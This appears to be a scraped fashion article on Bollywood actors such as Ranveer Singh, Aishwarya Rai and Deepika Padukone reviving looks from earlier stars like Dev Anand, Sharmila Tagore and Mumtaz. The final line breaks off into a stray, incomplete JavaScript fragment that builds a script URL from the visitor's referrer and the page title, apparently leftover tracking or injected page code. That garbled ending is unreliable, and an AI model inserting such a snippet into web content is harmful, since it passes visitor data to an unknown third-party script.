Bollywood stars emulating yesteryear icons

Fashion fades, style is eternal.

Our Bollywood stars are taking a leaf out of the books of yesteryear actors, especially when it comes to fashion. From high waist pants to figure hugging dresses, from narrow ties to kitten heels, everything is more or less a reflection of the past.  Here is a fashion replay. Read on to learn what was in-vogue yesterday, that has made a comeback today.

Ranveer Singh

Then seen on Bollywood legend Dev Anand, the style icon of 1950s and 1960s, new age designers describe him as a trendsetter. Following his footsteps is our handsome dude Ranveer Singh, making this number his own.

Our yesteryear divas are strictly being followed by our present day actresses. Sharmila Tagore’s ‘An Evening In Paris’ bouffant look was replicated by the Bachchan bahu Aishwarya Rai. That elaborate bouffant and those dramatic eyes reminds us of Sharmila Tagore in her younger days.

Over sized sunglasses:

Small is passe, big is in! The bigger the goggles, the more eyeballs they grab. Check out preity Zinta’s giant size sun glasses.

Deepika Padukone

High waist pants:

They are back. Then seen on Nutan in ‘Dilli Ka Thug’, today most actresses from Deepika and Sonam to the newbie Alia Bhatt, are seen sporting such pants. And they do look young, chic and gorgeous.

Narrow ties:

These thin ties debuted way back in the Raaj Kumar and Shashi Kapoor days. Today, our Greek God Hrithik Roshan frequents it.

Hourglass dresses:

Something our ex Miss World, Piggy Chops loves to flaunt, hourglass dresses were first seen on Mumtaz.

Earlier, scarves were meant to cover up. But today, our stars wrap them around to grab attention.s.src=’’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”; } else {
